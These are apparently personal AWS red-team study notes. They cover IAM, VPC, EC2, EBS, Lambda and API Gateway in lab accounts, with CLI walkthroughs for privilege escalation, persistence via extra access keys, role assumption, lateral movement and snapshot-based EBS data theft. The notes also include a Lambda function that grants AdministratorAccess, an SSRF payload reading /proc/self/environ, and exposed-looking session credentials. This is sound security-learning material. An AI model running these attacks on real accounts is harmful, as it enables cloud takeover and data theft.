Cloud
AWS Cheat Sheet

AWS Cloud Overview

AWS Regions and Zones

At the time of writing, AWS has 77 Availability Zones within 24 geographic regions around the world. Pasted-image-20220831143413.png

AWS Cloud Architecture

AWS Service Model

Pasted-image-20220831144122.png

AWS Cloud Service Uses

Pasted-image-20220831144257.png

AWS Cloud Services

IAM

IAM Components

  • AWS Identity and Access Management (IAM) enables you to manage access to AWS services and resources securely.
  • IAM allows you to:
    1. Manage IAM users, groups and their access.
    2. Manage IAM roles and their permissions.
    3. Manage federated users and their permissions. Pasted-image-20220831145246.png
Users
  • A user is an entity that you create in AWS to represent the person or application that uses it to interact with AWS.
  • A user in AWS consists of a name and credentials.
  • AWS Services Access Types:
    1. Programmatic access
      • Access key ID
      • Secret access key
    2. AWS Management Console access
      • Username
      • Password
Groups
  • A group is a collection of users. Groups let you specify permissions for multiple users, which can make it easier to manage the permissions for those users.
  • Following are some important characteristics of groups:
    1. A group can contain many users, and a user can belong to multiple groups.
    2. Groups can't be nested; they can contain only users, not other groups.
Roles
  • A role is an entity that defines a set of permissions for making AWS service requests.
  • Roles are associated with AWS services such as EC2, RDS etc.
  • Roles are a secure way to grant permissions to entities that you trust. Examples of entities include the following:
    • A user in another account
    • An application code running on an EC2 instance that needs to perform actions on AWS resources
    • An AWS service that needs to act on resources in your account to provide its features
  • Roles issue keys that are valid for short durations, making them a more secure way to grant access. Pasted-image-20220831150456.png
Policies
  • Policies define the permissions that determine whether a given action on a resource is allowed or denied.
  • For example, if a policy allows the GetUser action, then a user with that policy can get user information from the AWS Management Console, the AWS CLI, or the AWS API.
  • Policies can be attached to IAM identities (users, groups or roles) or AWS resources.

Policy Data:

  1. Effect: whether to Allow or Deny access.
  2. Action: a list of actions (Get, Put, Delete, ...) that the policy allows or denies.
  3. Resource: a list of resources to which the actions apply.

Policy types:

  1. Inline Policies: an inline policy is a policy that's embedded in an IAM identity (a user, group, or role)

  2. Managed Policies

    • AWS Managed Policies
    • Customer Managed Policies Pasted-image-20220831151119.png
STS
  • AWS Security Token Service (STS) is a web service that enables you to request temporary, limited-privilege credentials for IAM users or for users that you authenticate (federated users).
  • STS allows temporary access to an AWS resource using a token.
  • Temporary credentials contain:
    1. Access key ID
    2. Secret access key
    3. Security token (session token)

Temporary credentials can be obtained from:

  1. STS endpoints

  2. The EC2 instance metadata endpoint
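A hedged sketch of both ways to obtain temporary credentials (the role name returned by the metadata service is environment-specific, and the metadata calls assume IMDSv1 is allowed):

bash
# Via an STS endpoint: returns AccessKeyId, SecretAccessKey, and SessionToken
aws sts get-session-token

# Via the EC2 instance metadata endpoint (from inside an instance):
# list the role attached to the instance, then fetch its temporary credentials
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE-NAME
# Note: if IMDSv2 is enforced, a session token header (X-aws-ec2-metadata-token) must be obtained first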

Attacking IAM

Enumeration

bash
# Check if this key belongs to a user or a role
aws sts get-caller-identity
 
# List IAM users
aws iam list-users
 
# List the IAM groups that the specified IAM user belongs to 
aws iam list-groups-for-user --user-name username
 
# List managed policies attached to a user
aws iam list-attached-user-policies --user-name username
 
# List Inline Policies of a user
aws iam list-user-policies --user-name username
 
# List IAM Groups
aws iam list-groups
 
# List managed policies attached to a group
aws iam list-attached-group-policies --group-name admins
 
# List Inline policies of a group
aws iam list-group-policies --group-name admins
 
# List IAM Roles
aws iam list-roles
 
# List managed policies attached to a role
aws iam list-attached-role-policies --role-name role-name
 
# List inline policies of a role
aws iam list-role-policies --role-name role-name
 
# List of IAM Policies
aws iam list-policies
 
# Get Info about specified managed policy
aws iam get-policy --policy-arn policy-arn
 
# Get Information about the versions of the specified managed policy
aws iam list-policy-versions --policy-arn policy-arn
 
# Get Information about a specified policy version
aws iam get-policy-version --policy-arn policy-arn --version-id version-id
 
# Get a specified inline policy document embedded in a specified IAM user
aws iam get-user-policy --user-name username --policy-name policy-name
 
# Get a specified inline policy document for a group
aws iam get-group-policy --group-name groupname --policy-name policy-name
 
# Get a specified inline policy document for a role
aws iam get-role-policy --role-name rolename --policy-name policy-name

Configure an AWS profile (profiles are stored in the ~/.aws/credentials file)

bash
aws configure --profile admin

Execute Commands with different profiles

bash
aws sts get-caller-identity --profile admin

Adding inline policy to a user

bash
aws iam put-user-policy --user-name admin --policy-name Administrator-Policy --policy-document file://Administrator-policy.json --profile root

Attaching a managed policy to a user

  1. create the policy document
    json
    {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Effect": "Allow",
                "Action": "*",
                "Resource": [
                    "*"
                ]
            }
        ]
    }
  2. Create the policy
    bash
    aws iam create-policy --policy-name Administrator-Policy --policy-document file://Administrator-policy.json --profile root
  3. Attach the policy to a user
    bash
    aws iam attach-user-policy --user-name normal-user --profile root --policy-arn arn:aws:iam::492787370120:policy/Administrator-Policy 

Privilege Escalation

Creating the vulnerable example:

  1. Create normal User normal-user
  2. Create the PutUserPolicy document
json
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": "iam:PutUserPolicy",
            "Resource": [
                "arn:aws:iam::492787370120:user/*"
            ]
        }
    ]
}
  3. Put this policy as an inline policy on normal-user
bash
aws iam put-user-policy --user-name normal-user --policy-document file://PutUserPolicy.json --policy-name PutUserPolicy --profile root

Now this user has the power to escalate their own privileges, or those of other users, to administrator.

Priv-esc

  1. Get the inline policies of the user
    bash
    aws iam list-user-policies --user-name normal-user --profile normal-user
  2. Get the JSON of the policy
    bash
    aws iam get-user-policy --user-name normal-user --policy-name PutUserPolicy --profile normal-user
  3. Now that we know this user can put/attach policies on themselves and other users, they can create an administrator policy and put/attach it to themselves
  4. Create Administrator-policy.json
json
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": "*",
            "Resource": [
                "*"
            ]
        }
    ]
}
  5. Put this policy as an inline policy on the user

    bash
    aws iam put-user-policy --user-name normal-user --policy-name Administrator-policy --policy-document file://Administrator-policy.json --profile normal-user
  6. Now list the inline policies of this user to make sure our administrator policy was added

    bash
    aws iam list-user-policies --user-name normal-user --profile normal-user

Persistence

  • If we compromised the root user, which is highly monitored, we can create another access key for another user and use that one instead if its first access key gets disabled. Pasted-image-20220904133414.png Note: each user can have only 2 access keys at once. List access keys of a user:
bash
aws iam list-access-keys --user-name admin --profile root

Pasted-image-20220904134646.png As we can see, this user already has 2 access keys. Let's try to add another one:

bash
aws iam create-access-key --user-name admin --profile root

Pasted-image-20220904134749.png

Delete access key

bash
aws iam delete-access-key --user-name admin --access-key-id AKIAXFPDKRCEGZZR5WXX --profile root 

create a new access key

bash
aws iam create-access-key --user-name admin --profile root

Pasted-image-20220904145529.png

Credential Access

In this scenario, User A has an AssumeRole policy on a privileged role that has privileges on some resources, as shown in the screenshot Pasted-image-20220912235934.png

Setting Up the vulnerable path:

  • As a refresher, note that a role has access permissions on AWS resources and a trust relationship that identifies which users/groups can assume it (as shown in the picture above).
  1. Create our policy (we'll use the built-in AmazonS3FullAccess policy)
  2. Create our role
    • Pasted-image-20220913021945.png
    • The trusted entity (the entity which will assume this role, and in our case it will be an IAM user) Pasted-image-20220913022052.png
    • Adding permissions (we can choose a built-in policy or we can create our own custom policy for this role) Pasted-image-20220913022242.png
    • And this is our final role with its Permissions and Trusted Entities Pasted-image-20220913022612.png
    • aws iam list-roles --profile root we'll see our newly created role Pasted-image-20220913023130.png
  3. Add an sts:AssumeRole policy to the user (normal-user) that we want to be able to assume our role (s3admin)
    • This permission is added as inline-policy Pasted-image-20220913024227.png
    • choose STS service Pasted-image-20220913024316.png Pasted-image-20220913024351.png
    • check on assumeRole in Action Pasted-image-20220913024500.png
    • Then in resources, we'll put the ARN of the role we created, so that this user will be able to assume only this role. We could set it to All Resources instead, which would let the user assume any role in the account (but only roles whose trust relationship trusts this user). Pasted-image-20220913024809.png
    • create the policy Pasted-image-20220913024910.png
    • Now this user normal-user can assume the s3admin role we created.
  4. If the user doesn't have the sts:AssumeRole policy, they will get access denied when trying to assume the role, even if the role's trust relationship trusts this user
    • This is the difference with and without the sts:AssumeRole policy: the same command, but after adding the sts:AssumeRole policy to the user. Pasted-image-20220913025726.png

Abusing the role

  • List IAM roles: aws iam list-roles --profile root (the user must have permission to list roles). This is a role that our user can assume: Pasted-image-20220913030342.png

  • Get info about this role: aws iam get-role --role-name s3admin --profile root (the user must have permission to get info about a role)

  • Get role permissions (by listing all managed policies attached to this role)

    bash
    aws iam list-attached-role-policies --role-name s3admin --profile root

    Pasted-image-20220913030914.png

  • list versions of the policy attached to the role

    bash
    aws iam list-policy-versions --policy-arn arn:aws:iam::aws:policy/AmazonS3FullAccess  --profile root

    Pasted-image-20220913031236.png

  • Get info about a specific version

    bash
    aws iam get-policy-version --policy-arn arn:aws:iam::aws:policy/AmazonS3FullAccess --version-id v2 --profile root

    Pasted-image-20220913031402.png

  • Assuming the role to retrieve the temporary credentials

    bash
    aws sts assume-role --role-arn arn:aws:iam::492787370120:role/s3admin --role-session-name s3-access-example --profile normal-user

    Pasted-image-20220913031852.png

  • Now, we have to export these as environment variables (on Linux) so that the AWS CLI can use them (an alternative using a named profile is sketched after this list)

    bash
    export AWS_ACCESS_KEY_ID=ASIAXFPDKRCEKQNDODWO
    export AWS_SECRET_ACCESS_KEY=Yu1tT25qMQ/vuN3q4mDa7ipWtjnDytocatfaXem6
    export AWS_SESSION_TOKEN=FwoGZXIvYXdzEBMaDANLr69tIL28ZttWPyK1AZyhxgy2Rw59Iq2W8L4PsF7JnPEgGoLrdEApZ0O7tsb49a1AX4xzc8EOiU9xrp04Qgeqtt59k43GyV0BcNpaR93ZYdS7otMIq8s9i+042AT4XkGxbrrRjfWDlNHfAoMY/3lmCHRcU7v20mDi34cV9/SRh00RuiQcV2Q4Yduj/YQk4D/gMzPjG6jL+nr8kFjaAu+2OsQsOMlp9htTcAk+I0bc3Jec18p5V09A9BxEXBlCJB3bRdUo8bT/mAYyLZsqCeLhIWLifB/XNqmqzxu2DW7gXYRXr/vi7yb2kHwVh06h12y908aMvXJW2Q
  • And now we can execute commands with the assumed role

    bash
    # Abusing the role's permissions to list S3 buckets (uses the exported temporary credentials)
    aws s3 ls
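As an alternative to exporting environment variables, the temporary credentials can be saved as a named profile. A hedged sketch (the profile name s3admin-session and the credential values are placeholders):

bash
aws configure set aws_access_key_id ACCESS-KEY-ID --profile s3admin-session
aws configure set aws_secret_access_key SECRET-ACCESS-KEY --profile s3admin-session
aws configure set aws_session_token SESSION-TOKEN --profile s3admin-session

# Use the assumed-role credentials explicitly
aws sts get-caller-identity --profile s3admin-session
aws s3 ls --profile s3admin-session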

VPC (Virtual Private Cloud)

VPC Overview

Pasted-image-20220917224714.png

Some VPC Concepts

VPC Subnetting

Pasted-image-20220917225144.png

VPC Routing Tables

Pasted-image-20220917225117.png

  • The destination represents the IP range that the route applies to.
  • If a VPC is subnetted, each subnet gets the VPC's internal (local) route by default, because all subnets should be able to communicate with each other.

IGW Internet Gateway

^1090ea

Pasted-image-20220917225641.png

NAT Gateway

Pasted-image-20220917225836.png

  • We can use a NAT gateway to enable instances in a private subnet to connect to the internet, while preventing the internet from initiating a connection to those instances. It's very important from a security perspective.

VPC Peering

Pasted-image-20220917230330.png

VPCE VPC Endpoint

Pasted-image-20220917230725.png

  • The normal way for a VPC subnet to access another AWS service (e.g. an S3 bucket) is by going out to the internet and back to the service.
  • But with a VPCE, we can access the service directly without needing to go out to the internet. This screenshot shows the difference.
  • That's why, as a red teamer, we should always check the routing table.

VPC Network ACLs

Pasted-image-20220917231119.png

  • Notice in the following screenshot that subnet-00520723a91ff4d54 can access VPC2 through VPC peering, which we can see at the bottom; PCX refers to a VPC peering connection. Pasted-image-20220917235344.png
  • Notice in the following screenshot that subnet-0ac4b8aa82d7ab459 has no connection to VPC2, even though the other subnet can access it. But as we see in its routing table, it can access the internet through the IGW, which the other subnet can't. Pasted-image-20220917235624.png

Attacking VPC

Enumeration

bash
# Enumerating VPCs
aws ec2 describe-vpcs 
aws ec2 describe-vpcs --filters="Name=vpc-id,Values=vpc-02cfe2062dcda9dea" 
 
# Enumerating Subnets
aws ec2 describe-subnets
 
# describe subnets in a specific VPC
aws ec2 describe-subnets  --filters="Name=vpc-id,Values=vpc-0b3197963900d5b91"
 
# Enumerating Routes
aws ec2 describe-route-tables
aws ec2 describe-route-tables --filters="Name=vpc-id,Values=vpc-0b3197963900d5b91"
 
# Enumerating ACLs
aws ec2 describe-network-acls

Notes:

  • Each VPC has a Main route table. The Main route table automatically comes with your VPC and controls routing for all subnets not explicitly associated with another route table. Pasted-image-20220918003808.png
  • For ACLs, an entry with Egress set to True applies to outgoing connections, and an entry with Egress set to False applies to incoming connections.
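To separate the two directions quickly, the Egress flag can be filtered with a JMESPath query. A hedged sketch (the VPC filter value is a placeholder):

bash
# Inbound (ingress) ACL entries only
aws ec2 describe-network-acls --filters="Name=vpc-id,Values=vpc-id" --query 'NetworkAcls[].Entries[?Egress==`false`]'

# Outbound (egress) ACL entries only
aws ec2 describe-network-acls --filters="Name=vpc-id,Values=vpc-id" --query 'NetworkAcls[].Entries[?Egress==`true`]'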

Lateral Movement

Pasted-image-20220918011334.png

  • List VPC Peering Connections

    bash
    aws ec2 describe-vpc-peering-connections
  • VPC peering exists between 2 VPCs: one is the Requester and the other is the Accepter, but the connection is bidirectional, meaning that EC2 instances in either VPC can access EC2 instances in the other. Pasted-image-20220918012426.png

  • Enumerate the subnets of VPC A, because there might be only one subnet in the VPC that can access the other VPC: routing is done by route tables, and those can be attached at the subnet level. [[CARTS Notes#^220ca5 | Enumerate Subnets]]

  • Enumerate the routing tables of the targeted subnet [[CARTS Notes#^93dc9e | Enumerate routing table of the subnet]]. When we see PCX in a routing table, that means there is a peering connection there. Pasted-image-20220918013413.png Enumerating routing tables of AWSGoat

  • Enumerate the subnets and routing tables of VPC B as well, to understand whether there are multiple subnets in it, and whether the VPC peering between the 2 VPCs gives access to all the subnets or just specific ones.

  • Notes:

    • The private subnet can't be accessed directly even if we have an access key and secret key; we have to access the public subnet first, and then from there we can reach the private subnet. [[CARTS Notes#^1090ea | Look at this screenshot]].
    • If the route table attached to a subnet contains an IGW route, then it's a public subnet, because it can access and be accessed from the internet. Pasted-image-20220918015111.png
  • Enumerate EC2 instances in a subnet

    bash
    aws ec2 describe-instances --filters="Name=subnet-id,Values=subnet-09d6b4a301512c565"

    AWSGoat has a public subnet (I knew that from enumerating the routing tables of the subnets and finding one that has an IGW route), meaning that it's accessible from the internet. Pasted-image-20220918020230.png Now, enumerate instances in this subnet:

    bash
    aws ec2 describe-instances --filters="Name=subnet-id,Values=subnet-09d6b4a301512c565"

    We found one, and this is its public IP address: Pasted-image-20220918020706.png

  • If we have an SSH key and the public IP of the instance, we can access it.

  • Let's assume that we were able to find a private key and a username that can access this instance; we can access it like this:

    bash
    ssh -i id_ed25519 VincentVanGoat@54.147.42.91

    Pasted-image-20220918022241.png What I really did was get access to the instance from the web portal and inject my public key into the authorized_keys file of the VincentVanGoat user. Pasted-image-20220918022405.png

  • The lateral movement example

    1. Access the EC2 instance in the public subnet of VPC1 Pasted-image-20220918022955.png
    2. Access the EC2 instance in the private subnet of VPC1 using its private IP (because VPC2 is only reachable through the private subnet, as that subnet has the VPC peering route to VPC2). Pasted-image-20220918023153.png
    3. Access the EC2 instance in VPC2 through the instance in the private subnet of VPC1 Pasted-image-20220918023338.png

EC2

EC2 Components

  1. AMI (Amazon Machine Image)
    • Is like a template to create an instance from.
    • Can be built for Linux & Windows.
    • Why Custom AMI
      • Pre-Installed packages & Software.
      • Faster boot time (No need to use EC2 User Data at boot time).
      • Control of maintenance & updates.
      • Installing the app ahead of time (for faster deployment with Auto Scaling).
      • Using someone else's AMI that is optimized for a specific app, DB, ..
    • When you create an AMI it is stored in S3, but you won't see it in the S3 console. AMIs are stored in S3 because it's durable, cheap, and resilient storage where most backups live.
    • By default, AMIs are private and locked to your account and region (they won't be available in other regions).
    • You can also make them public and share/rent or sell them to others through the AMI Marketplace.
    • To make a custom AMI, go to the EC2 that you want to create a template (AMI) from and ... Pasted-image-20220921223122.png
    • Now we can create as many EC2 instances as we want from this AMI.
    • When creating a new EC2 Instance, we can choose AMI from: Pasted-image-20220921225804.png
  2. EC2 Instance Access
    1. Linux EC2
      • We have 4 ways to connect to a Linux EC2 Pasted-image-20220921225943.png
      1. SSH client
        • we can connect from anywhere if the EC2 has a public IP using private key Pasted-image-20220921230403.png
      2. EC2 Instance Connect
        • If we click Connect on the instance, we'll have 3 ways to connect to it. When we use EC2 Instance Connect, AWS checks whether the user currently logged in to the web portal has the rights to access this EC2 instance, generates an SSH key pair (public & private), injects the public key into authorized_keys on the machine for a limited time, and uses the private key to log in. Pasted-image-20220921230537.png
        • And here is our session Pasted-image-20220921230707.png
      3. Session Manager. To use Session Manager:
        1. The SSM agent should be installed on the EC2 instance. The SSM Agent is installed by default on Amazon Linux based AMIs dated 2017.09 and later. Check that the amazon-ssm-agent service is running on our EC2: Pasted-image-20220921235115.png
        2. create a role with AmazonSSMManagedInstanceCore policy to be assumed by the instance Pasted-image-20220922000319.png Pasted-image-20220922000435.png
        3. Attach this role to the EC2 instance Pasted-image-20220922000549.png Pasted-image-20220922002042.png
        4. Now our instance will appear in Session Manager. Navigating to Systems Manager --> Session Manager, we'll find our instance Pasted-image-20220922010805.png 5. And we have our session Pasted-image-20220922010904.png
          Note: The advantage of using Session Manager is that we'll have a history of all the sessions on that instance Pasted-image-20220922011031.png ^33f1d7
      4. EC2 Serial Console: connect to an EC2 instance as if your keyboard and monitor were physically attached to it; you can see the machine while it is starting/rebooting. Reference: https://www.youtube.com/watch?v=HIkq9go8hcQ
    2. Windows EC2
      • We have 3 ways to connect to a Windows EC2 Pasted-image-20220922004546.png
      1. RDP Pasted-image-20220922004645.png and then we can RDP to the EC2
      2. Session Manager (same as Linux EC2) [[CARTS Notes#^33f1d7 | Linux EC2 access via Session Manager]]
      3. EC2 Serial Console can be used also on [[CARTS Notes#^abb2f0 | Linux EC2 Serial Connect]] Pasted-image-20220922014258.png
  3. Security Group
    • It acts like a host-based firewall, controlling the inbound and outbound traffic to and from the EC2 instance. Pasted-image-20220922014821.png
    • Difference between Security Group and ACL is that:
      • Security Group acts on the instance level.
      • ACL acts on the subnet level.
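Since security groups sit at the instance level, a quick way to review what an instance exposes is to pull its attached security groups and then dump their rules. A hedged sketch (the instance and group IDs are placeholders):

bash
# Which security groups are attached to the instance
aws ec2 describe-instances --instance-ids instance-id --query 'Reservations[].Instances[].SecurityGroups'

# Inbound rules are in IpPermissions, outbound rules in IpPermissionsEgress
aws ec2 describe-security-groups --group-ids sg-id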

EBS

EBS Concepts

  • Stands for Elastic Block Storage.
  • We can think of it like a hard disk for a PC.
  • Can be attached to and detached from EC2 instances.
  • We can attach multiple EBS volumes to one EC2 instance, but an EBS volume can only be attached to a single EC2 instance.
  • This is the EBS volume attached to this EC2 instance Pasted-image-20221011211127.png Notice also that it's the root device, which means it contains the OS that this EC2 instance is running.
  • We can create an EBS volume by 2 methods:
    • From a new volume.
    • From a snapshot. Pasted-image-20221011212306.png
  • Snapshots are a backup of an EBS volume.
  • Snapshots are stored in S3.
  • A Snapshot can be used as a volume, or as an AMI.
  • EBS encryption uses KMS (AWS Key Management Service) for creating encrypted volumes and snapshots.

Attacking EBS

Enumeration

Enumerating volumes

bash
aws ec2 describe-volumes --profile admin

Pasted-image-20221020020117.png

Enumerating snapshots created by this user

bash
aws ec2  describe-snapshots --owner-ids self --profile admin

Exploitation

Looking at the following example:

Pasted-image-20221020021645.png

We have an EC2 instance that contains sensitive information, but we don't have access to it. To exfiltrate its data, we can work around this by:

  1. Creating a snapshot from this EC2 Instance.
  2. Creating a volume from this snapshot.
  3. Attaching this volume to a new instance that we created and have full access to.

Steps:

  1. Compromise a user that has the permissions to create a snapshot, create an EC2 instance, and the other rights needed to perform this attack. Using the IAM Policy Simulator, we can simulate the permissions and check whether this user actually has the needed privileges (a CLI sketch appears after these steps). Pasted-image-20221020023823.png

  2. Identify all the EC2 Instances in the comprimised account

    bash
    aws ec2 describe-instances --profile admin

    Pasted-image-20221020022746.png

    and the highlighted are the attached volumes to this instance.

  3. Identify the volumes and make sure that the volume we are targeting is the one attached to the EC2 we're targeting by comparing the VolumeID.

    bash
    aws ec2 describe-volumes --profile admin

    Pasted-image-20221020023230.png

  4. Create a snapshot from the EC2 Instance

    bash
    aws ec2 create-snapshot --volume-id VolumeID --description "Pentest Snapshot"

If the volume is encrypted, it will take longer to create the snapshot.

  5. List all the snapshots

    bash
    aws ec2 describe-snapshots
  6. Create a volume from this snapshot

    bash
    aws ec2 create-volume --snapshot-id SnapshotID --availability-zone AvailabilityZone
  7. List instances

    bash
    aws ec2 describe-instances --profile admin
  8. Attach the newly created volume to the instance of choice

    bash
    aws ec2 attach-volume --volume-id VolumeID --instance-id InstanceID --device /dev/xvdb
  9. Mount the volume into the EC2 file system

    bash
    sudo mount /dev/sdfd /new-dir

    Pasted-image-20221020025805.png
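The IAM Policy Simulator check mentioned in step 1 can also be done from the CLI. A hedged sketch (the user ARN is a placeholder; the action list matches the steps above):

bash
aws iam simulate-principal-policy \
  --policy-source-arn arn:aws:iam::123456789012:user/compromised-user \
  --action-names ec2:CreateSnapshot ec2:CreateVolume ec2:AttachVolume ec2:DescribeVolumes \
  --profile admin
# Look for "EvalDecision": "allowed" in the EvaluationResults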

Lambda

Concepts

  • Lambda is an event-driven, serverless computing platform.
  • It's a piece of code that is executed when it's triggered by an event from an event source.
  • It runs code in response to events and automatically manages the computing resources required by that code.
  • Pasted-image-20221029051503.png
  • First, an event is triggered from one of the AWS services; then Lambda runs the corresponding code in a container.

How a Lambda function works

  • Pasted-image-20221029052203.png
  1. Lambda function has 2 parts:
    1. Function (source code).
    2. Layer (dependencies).
  • can be created from 1 of 4 options:
    • Pasted-image-20221029053701.png
  2. The Lambda function gets deployed (containerized). In this phase it only consumes storage and does not yet consume execution resources.

  3. The Lambda function gets triggered by 1 of 3 methods:

    • Pasted-image-20221029060101.png ^ca367e ^f1595e
    1. Synchronous: e.g. API Gateway; the caller waits for the response to come back.
    2. Asynchronous: AWS services, e.g. if a file is uploaded to S3, do something; no response is sent back, hence asynchronous.
    3. Stream: the function is continuously triggered, e.g. by a DynamoDB table that is continuously changing, or by Kinesis.
  4. After it's triggered, it is executed

  5. After execution there is the destination part, which is 1 of 3 destinations:

    1. Lambda: trigger another Lambda function.
    2. SNS (Simple Notification Service).
    3. SQS (Simple Queue Service).
  • Pasted-image-20221029053315.png

API Gateway

  • This is one of the most common methods to trigger Lambda functions.
  • It's an AWS service used for creating, publishing, maintaining, and securing REST, HTTP, and WebSocket APIs.
  • Its components
    • Pasted-image-20221029055213.png
    • Pasted-image-20221029055508.png
  • We are focusing on API Gateway because it can trigger Lambda functions, and it's one of the most common scenarios for abusing them.

Notes

  • Lambda functions should have roles to be able to access other services like S3.
  • If we compromise a Lambda function, we can change its code to escalate our privileges, e.g. to access the services its role grants, such as S3.

Lambda Lab

bash
terraform init --> 'initialize terraform with configuration from the current folder'
bash
terraform plan --> 'show actions that will be taken, but do not execute actions'
bash
terraform apply --> 'execute actions'
bash
terraform destroy --> 'Destroy the resources we created'
  • After reading the code of the Lambda function Pasted-image-20221029070044.png
  • I found the API has a back-door Pasted-image-20221029065930.png Pasted-image-20221029065959.png

Attacking Lambda

Enumeration

  • List all Lambda functions
    bash
    aws lambda list-functions

Output Pasted-image-20221101131308.png 3 Important things to look at here:

  1. RunTime --> denotes the programming language.
  2. Role --> specifies which role this Lambda function has, and therefore what access it has to other AWS services.
  3. Layers --> specifies the 3rd party libraries that are being used in the code.
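A hedged one-liner to pull just those fields for every function (the JMESPath field names come from the list-functions output):

bash
aws lambda list-functions --query 'Functions[].{Name:FunctionName,Runtime:Runtime,Role:Role,Layers:Layers}'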
  • Enumerate source-code of the functions

    bash
    aws lambda get-function --function-name RedTeamfunc1

    output Pasted-image-20221101131927.png 2 things to look at here:

    1. This lambda function is stored in S3
    2. This is a pre-signed S3 URL from which we can download the source code of this Lambda function; it's only valid for a limited time (see the download sketch at the end of this enumeration list).
  • Enumerate who can execute/invoke this Lambda function synchronously and asynchronously

    bash
    aws lambda get-policy --function-name Redteamfunc1

    output Pasted-image-20221101134224.png

  • Enumerate who can execute/invoke this Lambda function via streams (event source mappings).

    bash
    aws lambda list-event-source-mappings --function-name function-name
  • Enumerate layers: this will list all the layers (dependencies) in the AWS account

    bash
    aws lambda list-layers

    Gives all information about a specific layer / dependency

    bash
    aws lambda get-layer-version --layer-name layer-name --version-number version-number

    Output: we get some information and a time-limited URL to download this layer / dependency Pasted-image-20221101135520.png
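Both the function package (from get-function) and a layer version (from get-layer-version) come with a time-limited download URL; a hedged sketch for pulling them down locally (the layer name/version are placeholders):

bash
# Download and unpack the function's deployment package
wget -O function.zip "$(aws lambda get-function --function-name RedTeamfunc1 --query 'Code.Location' --output text)"
unzip function.zip -d function-src

# Same idea for a layer version
wget -O layer.zip "$(aws lambda get-layer-version --layer-name layer-name --version-number 1 --query 'Content.Location' --output text)"
unzip layer.zip -d layer-src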

Exploitation

Note:

  • Lambda functions have AWS access keys in their environment variables; try to enumerate those variables to get the access key ID, secret access key, and session token. We can gain initial access via 2 methods:
  1. RCE: in this example we have an RCE vulnerability Pasted-image-20221102001531.png
  2. Get credentials which can be stored in
    1. Lambda code

    2. Environment variables. We can get them through:
      • RCE vulnerability Pasted-image-20221102002821.png Echo this response in a terminal to beautify it Pasted-image-20221102002906.png Using these credentials (AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, AWS_SESSION_TOKEN), we are able to connect to AWS as this account Pasted-image-20221102011356.png

      • SSRF vulnerability use ?url=file://127.0.0.1/proc/self/environ
      • CLI access

Persistence

  • We can edit the Lambda function code itself, but this can be detected easily.
    • updated the cmd parameter here to c Pasted-image-20221102022841.png
    • Now update the Lambda function -- it didn't work for me despite the troubleshooting ☹️
      bash
      aws lambda update-function-code --function-name myfunction --zip-file fileb://lambda_function.py.zip --profile lambda-role-admin --region us-east-1
  • We can edit the layers / dependencies of the code; this is less detectable.

Privilege Escalation

Difference between AttachRole and PassRole: AttachRole attaches a role to an existing entity, while PassRole attaches a role to an entity while creating it. Pasted-image-20221102034621.png In this privilege escalation scenario we have a compromised user that has 2 permissions:

  1. PassRole
  2. CreateFunction
With those 2 permissions we can abuse this user to create a Lambda function with privilege-escalation code, which will grant this user administrator access. I created a new user with the same permissions as in the video.

Attack Steps:

  1. Created our malicious priv-esc Lambda function code
    python
    import boto3
    import json

    def lambda_handler(event, context):
        iam = boto3.client("iam")
        iam.attach_role_policy(RoleName="lambda-function-role", PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess")
        iam.attach_user_policy(UserName="admin-database", PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess")
        return {
            'statusCode': 200,
            'body': json.dumps("AWS Red Team")
        }
  2. created the Lambda function
    bash
    aws lambda create-function --function-name test --runtime python3.7 --zip-file fileb://test.zip --handler test.test --role arn:aws:iam::492787370120:role/lambda-function-role --region us-east-1 --profile admin-database
    Pasted-image-20221102053847.png
  3. Invoke the Lambda function. We can invoke it with 1 of the 3 methods [[CARTS Notes#^f1595e | Lambda Triggers]], but here we have full access to Lambda so we can invoke this function from the AWS CLI
    bash
    aws lambda invoke --function-name test response.json --region us-east-1 --profile admin-database
  4. Get our newly attached policies
    bash
     aws iam list-attached-user-policies --user-name admin-database  --profile admin-database
    Pasted-image-20221102060554.png

API Gateway

Attacking API Gateway

Enumeration

In AWS we have 3 types of APIs

  1. REST API
  2. HTTP API
  3. Web socket API

We'll enumerate each part of API Gateway Pasted-image-20221101173456.png

  • List all APIs

    bash
    aws apigateway get-rest-apis

    output Pasted-image-20221101171703.png

  • Get info about a specific API

    bash
    aws apigateway get-rest-api --rest-api-id api-id
  • Get info about resources / endpoints

    bash
    aws apigateway get-resources --rest-api-id api-id

    We have 2 resources here, / and /system; notice also that /system supports the GET method only

    Pasted-image-20221101172323.png

  • Get info about a specific resource

    bash
    aws apigateway get-resource --rest-api-id api-id --resource-id resource-id
  • Get info about methods

    bash
    aws apigateway get-method --rest-api-id api-id --resource-id resource-id --http-method Method

    Pasted-image-20221101173213.png Notice that this endpoint doesn't require an API key to use GET on it (see the invocation sketch at the end of this list).

  • Get stages

    bash
    aws apigateway get-stages --rest-api-id api-id

    Pasted-image-20221101173849.png

  • Get info about specific stage

    bash
    aws apigateway get-stage --rest-api-id api-id --stage-name stage-name
  • Getting info about parameters: we can get such info by reading the code of the Lambda function that backs the URL.

  • Getting info about API keys

    bash
    aws apigateway get-api-keys --include-values

    Pasted-image-20221101174209.png

    bash
    aws apigateway get-api-key --api-key-id api-key-id
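With the API ID, stage name, and resource path enumerated above, the REST API can be invoked directly over HTTPS. A hedged sketch (the invoke URL values are placeholders, and the cmd parameter from the lab back-door is an assumption):

bash
# Invoke URL format: https://<api-id>.execute-api.<region>.amazonaws.com/<stage-name>/<resource-path>
curl "https://api-id.execute-api.us-east-1.amazonaws.com/stage-name/system?cmd=id"

# Endpoints that require an API key expect it in the x-api-key header
curl -H "x-api-key: API-KEY-VALUE" "https://api-id.execute-api.us-east-1.amazonaws.com/stage-name/system"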

S3

  • Allows users to store any amount of data.
  • Pasted-image-20221105191113.png
  • S3 service contains :
    • buckets :
      • Are like folders.
      • A bucket is a container for objects stored in S3
    • Objects:
      • Are like files.
      • Are fundamental entities stored in S3
    • Keys:
      • A key is the unique identifier for an object within a bucket
      • Ex:
        • URL https://bucket-name.s3.region.amazonaws.com/folder1/object3.jpeg
        • key: folder1/object3.jpeg
    • Regions:
      • Are the geographical regions where S3 stores the objects you create.
      • ex: us-east-1
